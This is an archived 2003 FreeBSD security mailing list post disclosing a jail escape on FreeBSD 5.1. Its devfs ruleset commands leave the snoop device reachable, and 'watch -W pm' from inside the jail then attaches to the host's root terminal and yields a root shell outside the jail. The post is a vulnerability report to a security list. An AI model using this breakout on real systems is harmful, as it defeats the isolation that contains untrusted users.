jail + devfs + snp problem (FreeBSD 5.1-RELEASE-p10)

From: Adam Nowacki (ptnowak_at_bsk.vectranet.pl)
Date: 10/19/03

Next message: Alhagie Puye: "Equal bandwidth configuration among host with dummynet"

Previous message: Kris Kennaway: "Re: freebsd.org mirroring"
Next in thread: Poul-Henning Kamp: "Re: jail + devfs + snp problem (FreeBSD 5.1-RELEASE-p10)"
Reply: Poul-Henning Kamp: "Re: jail + devfs + snp problem (FreeBSD 5.1-RELEASE-p10)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Sun, 19 Oct 2003 23:12:59 +0200
To: freebsd-security@freebsd.org

shell# /sbin/devfs rule -s 2 delset
shell# /sbin/devfs rule -s 2 add hide
shell# /sbin/devfs rule -s 2 add path random unhide
shell# /sbin/devfs rule -s 2 add path urandom unhide
shell# /sbin/devfs rule -s 2 add path zero unhide
shell# /sbin/devfs rule -s 2 add path pty\* unhide
shell# /sbin/devfs rule -s 2 add path pty\* unhide
shell# /sbin/devfs rule -s 2 add path tty\* unhide
shell# /sbin/mount_devfs devfs /storage0/site/dev
shell# /sbin/devfs -m /storage0/site/dev ruleset 2
shell# cd /storage0/site/dev
shell# ls
fd ptyp6 ptypf ptypo ttyld0 ttyp7 ttypg ttypp ttyv6 ttyvf
net ptyp7 ptypg ptypp ttyld1 ttyp8 ttyph ttypq ttyv7 urandom
null ptyp8 ptyph ptypq ttyp0 ttyp9 ttypi ttypr ttyv8 zero
ptyp0 ptyp9 ptypi ptypr ttyp1 ttypa ttypj ttyv0 ttyv9
ptyp1 ptypa ptypj random ttyp2 ttypb ttypk ttyv1 ttyva
ptyp2 ptypb ptypk ttyd0 ttyp3 ttypc ttypl ttyv2 ttyvb
ptyp3 ptypc ptypl ttyd1 ttyp4 ttypd ttypm ttyv3 ttyvc
ptyp4 ptypd ptypm ttyid0 ttyp5 ttype ttypn ttyv4 ttyvd
ptyp5 ptype ptypn ttyid1 ttyp6 ttypf ttypo ttyv5 ttyve

Everything looks great, but:

shell# w -n
USER TTY FROM LOGIN@ IDLE WHAT
root pm ??? ??? - w -n
shell# jexec 1 /bin/sh
# cd /dev
# ls -al snp*
ls: snp*: No such file or directory
# watch -W pm
shell# id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)

And I'm outside !

_______________________________________________
freebsd-security@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"

Next message: Alhagie Puye: "Equal bandwidth configuration among host with dummynet"

Previous message: Kris Kennaway: "Re: freebsd.org mirroring"
Next in thread: Poul-Henning Kamp: "Re: jail + devfs + snp problem (FreeBSD 5.1-RELEASE-p10)"
Reply: Poul-Henning Kamp: "Re: jail + devfs + snp problem (FreeBSD 5.1-RELEASE-p10)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]